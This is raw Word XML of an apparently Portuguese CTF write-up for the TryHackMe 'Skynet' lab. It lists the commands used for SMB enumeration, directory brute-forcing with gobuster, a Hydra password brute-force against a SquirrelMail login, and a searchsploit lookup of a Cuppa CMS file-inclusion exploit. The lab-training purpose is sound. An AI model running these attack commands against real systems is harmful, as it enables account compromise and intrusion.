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EF655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4FBCC211" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00AC45F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F79900" wp14:editId="3DB55F54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DDFF1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6D34EB40" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00AC45F8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2231FA20" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="006A1456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Skynet </w:t>
      </w:r>
      <w:r w:rsidR="00AC45F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>TryHackMe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72556B79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D20060" w14:paraId="3CE905F4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208F698" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00AC45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D20060" w14:paraId="2AC7C18D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="417"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4247" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52962839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6591F097" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="006A1456" w:rsidP="006A145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Skynet </w:t>
            </w:r>
            <w:r w:rsidR="00AC45F8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D20060" w14:paraId="20102EEC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="422"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4247" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C58F8E4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0C51254A" w14:textId="5BDAEA25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D20060" w14:paraId="3E3642BD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="412"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4247" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27E4DF90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12616A43" w14:textId="3F917F6E" w:rsidR="00D20060" w:rsidRDefault="001220E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</w:tr>
      <w:tr w:rsidR="00D20060" w14:paraId="54FAFA97" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="412"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4247" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42AB218E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3A3316B5" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00C80A7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80A73">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>https://tryhackme.com/r/room/skynet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B6C4EB8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D20060" w14:paraId="08D140FC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="358"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2832" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4514B6D8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46B759AE" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00C80A7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02F8408E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D20060" w14:paraId="28328829" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2832" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EB6BC45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236180CB" w14:textId="397F8DD8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3877C7"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6E96BF37" w14:textId="118D50E9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D20060" w14:paraId="53572207" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="426"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2832" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="359E4504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13CA862B" w14:textId="7B583C98" w:rsidR="00D20060" w:rsidRDefault="001220E1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3877C7"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5B89DFAF" w14:textId="0113CC0F" w:rsidR="00D20060" w:rsidRDefault="001220E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Conselheiro</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50C13E22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D20060" w14:paraId="70F60B19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20798528" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00AC45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D20060" w14:paraId="0E0A411E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="416"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A14A76F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5680FC8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34327048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D20060" w14:paraId="1F9A79E6" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="408"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A70CFE6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14E486A5" w14:textId="0FE1127B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16/10/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5664" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E0E247C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D20060" w14:paraId="129D8ABF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="428"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04431FA9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1E22453A" w14:textId="72F1F47A" w:rsidR="00D20060" w:rsidRDefault="003877C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22/10/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5664" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23C689B4" w14:textId="77777777"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D20060" w14:paraId="3F05E572" w14:textId="77777777" w:rsidTr="00EF69EC">
        <w:trPr>
          <w:trHeight w:val="390"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40E07862" w14:textId="77777777"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7E772DE0" w14:textId="36A8C791" w:rsidR="00D20060" w:rsidRPr="001220E1" w:rsidRDefault="001220E1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</w:t>
            </w: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/10/2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5664" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D27E841" w14:textId="77129FD4" w:rsidR="00D20060" w:rsidRDefault="001220E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Revisão e </w:t>
            </w:r>
            <w:r w:rsidR="00AC45F8"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60402C77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18F6BA35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4C524916" w14:textId="77777777"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14:paraId="0BCAB5ED" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00AC45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666630514"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="7AB1EBE8" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00AC45F8" w:rsidP="00C80A7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16B426EF" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00AC4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184657D9" w14:textId="77777777" w:rsidR="00D20060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What is Miles password for his emails?</w:t>
            </w:r>
            <w:r w:rsidR="00AC45F8">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5DA4DC13" w14:textId="36034823" w:rsidR="00D20060" w:rsidRPr="001220E1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hyperlink w:anchor="_heading=h.2et92p0">
            <w:r w:rsidRPr="001220E1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>What is the hidden directory?</w:t>
            </w:r>
            <w:r w:rsidR="00AC45F8" w:rsidRPr="001220E1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidR="00EF69EC" w:rsidRPr="001220E1">
            <w:rPr>
              <w:color w:val="000000"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>6</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="189BA03E" w14:textId="2E538A00" w:rsidR="00D20060" w:rsidRPr="001220E1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hyperlink w:anchor="_heading=h.tyjcwt">
            <w:r w:rsidRPr="001220E1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>What is the vulnerability called when you can include a remote file for malicious purposes?</w:t>
            </w:r>
            <w:r w:rsidR="00AC45F8" w:rsidRPr="001220E1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidR="00EF69EC" w:rsidRPr="001220E1">
            <w:rPr>
              <w:color w:val="000000"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>7</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="255F2E1C" w14:textId="0B09FFFC" w:rsidR="00D20060" w:rsidRPr="001220E1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lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_heading=h.3dy6vkm">
            <w:r w:rsidRPr="001220E1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>What is the user flag:?</w:t>
            </w:r>
            <w:r w:rsidR="00AC45F8" w:rsidRPr="001220E1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidR="00EF69EC" w:rsidRPr="001220E1">
            <w:rPr>
              <w:color w:val="000000"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>8</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4F78BBDE" w14:textId="5D312750" w:rsidR="006A1456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 w:rsidRPr="003877C7">
            <w:rPr>
              <w:color w:val="000000"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>What is the root flag?</w:t>
          </w:r>
          <w:r w:rsidRPr="003877C7">
            <w:rPr>
              <w:color w:val="000000"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidR="00EF69EC">
            <w:rPr>
              <w:color w:val="000000"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>9</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="65CC095D" w14:textId="15A7A7A6" w:rsidR="00D20060" w:rsidRDefault="00AC4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EF69EC">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>11</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5F902D31" w14:textId="578C29CF" w:rsidR="00D20060" w:rsidRDefault="00AC4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EF69EC">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>11</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3922AD08" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00AC45F8">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="0254EBE5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0EEA5775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4F29DDE0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1431B7F7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26B2D2F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74B15596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22D62D0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3234A133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281900FD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6247AD1E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72C9557A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30E113A5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45BB7131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42F22CE2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5FB0A9E6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1772C78E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295E54C0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22E60C23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6E6C7201" w14:textId="77777777"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14:paraId="0241CB7C" w14:textId="77777777"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0D469B7A" w14:textId="7FA015DF" w:rsidR="0029230B" w:rsidRDefault="002923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29230B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Este CTF oferece uma experiência prática e desafiadora, explorando desde a fase de reconhecimento de uma rede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Pr="0029230B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>onde informações cruciais sobre serviços, portas abertas e sistemas são descobertas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0029230B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> até a escalada de privilégios para se obter controle total sobre as máquinas. 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3F98F0C6" w14:textId="77777777" w:rsidR="0029230B" w:rsidRDefault="002923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64B41A6" w14:textId="68C7446D" w:rsidR="00D20060" w:rsidRPr="003877C7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r w:rsidRPr="003877C7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</w:p>
    <w:p w14:paraId="70225BDD" w14:textId="77777777" w:rsidR="006A1456" w:rsidRPr="003877C7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1" w:name="_heading=h.3znysh7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/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Miles password for his emails?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712B0FF7" w14:textId="48590854" w:rsidR="00D20060" w:rsidRDefault="001B1B7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Sempre começando com um simples nmap, </w:t>
      </w:r>
      <w:r w:rsidR="0029230B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>onde</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> já é possível notar que há 6 portas abertas, sendo elas 22, 80, 110,139, 143 e 445</w:t>
      </w:r>
      <w:r w:rsidR="00AC45F8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Também há uma coisa muito interessante, um serviço samba.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C10591D" w14:textId="77777777" w:rsidR="001B1B77" w:rsidRDefault="001B1B77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B1B77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nmap –sS –sC &lt;ip_target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A37740B" w14:textId="77777777" w:rsidR="001B1B77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216FA8C" wp14:editId="7696AF50">
            <wp:extent cx="5200798" cy="22193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8853" cy="22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A0E9" w14:textId="77777777" w:rsidR="001B1B77" w:rsidRDefault="001B1B77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4808FF75" w14:textId="77777777" w:rsidR="001B1B77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Há 2 formas de descobrir os clientes do samba, você pode tentar qualquer uma.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3D0C3D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 xml:space="preserve">: enum4linux &lt;ip_target&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0B46BD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smbmap –H &lt;ip_target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A5C4E8" w14:textId="77777777"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DD083FB" wp14:editId="1363E7AA">
            <wp:extent cx="5400040" cy="562733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E90C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</w:p>
    <w:p w14:paraId="341C595C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Há 2 que é possível analisar, mas o foco agora é no ”anonymous”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9CFCC2" w14:textId="77777777" w:rsidR="00C539C9" w:rsidRPr="003877C7" w:rsidRDefault="00C539C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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Comando usado: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smbclient  //&lt;ip_target&gt;/anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27996C41" w14:textId="77777777"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ABB1010" wp14:editId="75643590">
            <wp:extent cx="5610225" cy="590534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0072" cy="59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C1EB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</w:p>
    <w:p w14:paraId="3A4E3913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Tendo acesso, terá logo em seguida um arquivo para baixar e um diretório, aonde irá ter mais alguns arquivos para download .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F06C89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mget *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5380AD6B" w14:textId="77777777"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067C9FA" wp14:editId="48BC4E9E">
            <wp:extent cx="5400040" cy="1594105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C00F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</w:p>
    <w:p w14:paraId="6199BF49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os arquivos baixados, o primeiro a ser analizado será o “log1.txt”. Uma wordlist, aonde há uma pequena quantidade de supostas senhas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624C4A6E" w14:textId="77777777"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outro arquivo entrega a informação do nome do alvo, porém, com os passos acima do write up, já foi possível determinar isso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D041EB" w14:textId="77777777" w:rsidR="00C539C9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B20D238" wp14:editId="352DB1D8">
            <wp:extent cx="3448050" cy="3194982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9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93B0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</w:p>
    <w:p w14:paraId="77978D11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as duas informações, é necessário um diretório para realizar um ataque bruteforce. Com o gobuster isso é possível. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0BC5FB" w14:textId="77777777" w:rsidR="00C80A73" w:rsidRPr="003877C7" w:rsidRDefault="00C80A73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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lastRenderedPageBreak/>
        <w:t>Comando usado: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gobuster dir -w /usr/share/dirb/wordlists/common.txt -u  http://</w:t>
      </w:r>
      <w:r w:rsidR="00780A57" w:rsidRPr="003877C7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;ip_target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB6EAF3" w14:textId="77777777" w:rsidR="007D4C84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50C7CEB" wp14:editId="3B2107DB">
            <wp:extent cx="5400040" cy="317110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5208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</w:p>
    <w:p w14:paraId="0837CA03" w14:textId="77777777" w:rsidR="00C80A73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a análise do gobuster, foi possível acessar o “squirrelmail” , o email do nosso alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4D850B" w14:textId="77777777" w:rsidR="007D4C84" w:rsidRDefault="00C80A73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D373725" wp14:editId="4A4B776F">
            <wp:extent cx="5400040" cy="210857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DA6D" w14:textId="77777777" w:rsidR="000E2A5E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 Hydra, o</w:t>
      </w:r>
      <w:r w:rsidR="000E2A5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bruteforce vai ser realizado  e também a resposta da primeira pergunta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C962DC" w14:textId="77777777" w:rsidR="00C80A73" w:rsidRPr="003877C7" w:rsidRDefault="000E2A5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003877C7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Comando usado: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hydra -l mile</w:t>
      </w:r>
      <w:r w:rsidR="00780A57" w:rsidRPr="003877C7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sdyson -P log1.txt &lt;ip_target&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003877C7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> http-post-form "/squirrelmail/src/login.php:login_username=^USER^&amp;secretkey=^PASS^&amp;js_autodetect_results=1&amp;just_logged_in=1:Unknown user or password incorrect."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E274E8" w14:textId="77777777" w:rsidR="007D4C84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C31B3DE" wp14:editId="29CE1D9F">
            <wp:extent cx="6280005" cy="1200150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047" cy="12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99BC" w14:textId="77777777" w:rsidR="007D4C84" w:rsidRDefault="007D4C84">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="613596A3" w14:textId="77777777" w:rsidR="006A1456" w:rsidRPr="003877C7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2et92p0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/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hidden directory?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE0E725" w14:textId="77777777"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 acesso ao email, e olhando eles, há um que chama muita atenção. Provavelmente sendo a senha do samba client do Miles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521060EA" w14:textId="77777777" w:rsidR="007D4C84" w:rsidRDefault="007D4C84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7D4C84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63532BA9" wp14:editId="08BED681">
            <wp:extent cx="5400040" cy="213667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CF1E" w14:textId="77777777"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EB09122" w14:textId="77777777" w:rsidR="000E2A5E" w:rsidRDefault="000E2A5E" w:rsidP="000E2A5E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senha estava correta, agora só dar uma olhada no arquivos e no diretório “notes”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BC9A06" w14:textId="77777777" w:rsidR="00057666" w:rsidRDefault="0005766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C37B9C1" wp14:editId="20DDDF02">
            <wp:extent cx="5400040" cy="1961318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9565" w14:textId="77777777"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73092CE3" w14:textId="77777777" w:rsidR="00E505AC" w:rsidRDefault="00E505AC" w:rsidP="000E2A5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só baixar o “importante.txt”</w:t>
      </w:r>
      <w:r w:rsidR="003938D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420C0191" w14:textId="77777777" w:rsidR="00E505AC" w:rsidRPr="00E505AC" w:rsidRDefault="00E505AC" w:rsidP="000E2A5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E505AC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mget importante.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A4F050" w14:textId="77777777" w:rsidR="003938D9" w:rsidRDefault="00057666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7AC1048C" wp14:editId="59D8713C">
            <wp:extent cx="5400040" cy="416704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28B3" w14:textId="77777777" w:rsidR="003938D9" w:rsidRPr="003938D9" w:rsidRDefault="003938D9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com a informação de um novo diretório escondido, possível entrar nele. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BA0344" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00E505AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial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F7CE6BB" wp14:editId="55AC8F44">
            <wp:extent cx="4258270" cy="885949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0FF0" w14:textId="77777777" w:rsidR="00057666" w:rsidRPr="003877C7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3" w:name="_heading=h.tyjcwt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3"/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vulnerability called when you can include a remote file for malicious purposes?</w:t>
      </w:r>
      <w:r w:rsidR="00057666"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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9C2190" w14:textId="77777777" w:rsidR="003938D9" w:rsidRDefault="003938D9" w:rsidP="006A1456">
      <w:pP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</w:pPr>
      <w:r w:rsidRPr="003938D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Resposta: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3938D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Remote File Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C04DB5" w14:textId="77777777" w:rsidR="003938D9" w:rsidRDefault="003938D9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Após entrar no diretório escondido, não há basicamente nada aqui, apenas informações irrelevantes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3171DBAB" w14:textId="77777777" w:rsidR="00057666" w:rsidRDefault="0005766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800FCCB" wp14:editId="38EED076">
            <wp:extent cx="5400040" cy="21116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EA76" w14:textId="77777777" w:rsidR="003938D9" w:rsidRDefault="003938D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FA3ABAC" w14:textId="77777777" w:rsidR="003938D9" w:rsidRDefault="003938D9">
      <w:pP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Após</w:t>
      </w:r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isso, é necessário usar novamente o gobuster, pórem agora com o novo diretório. Achando o “ /administrator”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FDDA98" w14:textId="77777777"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703669">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs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</w:t>
      </w:r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gobuster dir -w /usr/share/dirb/wordlists</w:t>
      </w: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/common.txt -u  http://&lt;ip_target&gt;</w:t>
      </w:r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/45kra24zxs28v3yd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B7F5D3" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="0005766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3CC01B1B" wp14:editId="30DCA54A">
            <wp:extent cx="5400040" cy="1920381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7C31" w14:textId="77777777"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0CF23CB" w14:textId="77777777" w:rsidR="00150B1D" w:rsidRDefault="00150B1D" w:rsidP="00150B1D">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/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Agora foi possível achar </w:t>
      </w:r>
      <w:r w:rsidRPr="00150B1D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que a página está executando o CuppaCM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. Então utilizar o searchsploit para procurar alguma falha.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759CDADD" w14:textId="77777777" w:rsidR="00150B1D" w:rsidRPr="00150B1D" w:rsidRDefault="00150B1D" w:rsidP="00150B1D"/>
    <w:p w14:paraId="1D85525D" w14:textId="77777777"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EB579DA" w14:textId="77777777" w:rsidR="00B60B06" w:rsidRDefault="00B60B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BBDD07E" wp14:editId="5BF4259F">
            <wp:extent cx="5400040" cy="224299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5F49" w14:textId="77777777" w:rsidR="00150B1D" w:rsidRDefault="00150B1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6244B1D" w14:textId="77777777" w:rsidR="00150B1D" w:rsidRDefault="00150B1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Então apenas falta escolher o único acessível e baixa-lo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096257FA" w14:textId="77777777" w:rsidR="00150B1D" w:rsidRDefault="00150B1D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150B1D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searchsploit Cuppa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD5CD64" w14:textId="77777777" w:rsidR="00150B1D" w:rsidRDefault="00150B1D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150B1D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searchsploit –m php/webapps/25971.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51353850" w14:textId="77777777" w:rsidR="00B60B06" w:rsidRPr="00057666" w:rsidRDefault="00B60B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0543947" wp14:editId="7A261D93">
            <wp:extent cx="5400040" cy="138331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3DBE" w14:textId="77777777" w:rsidR="00B60B06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" w:name="_heading=h.3dy6vkm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
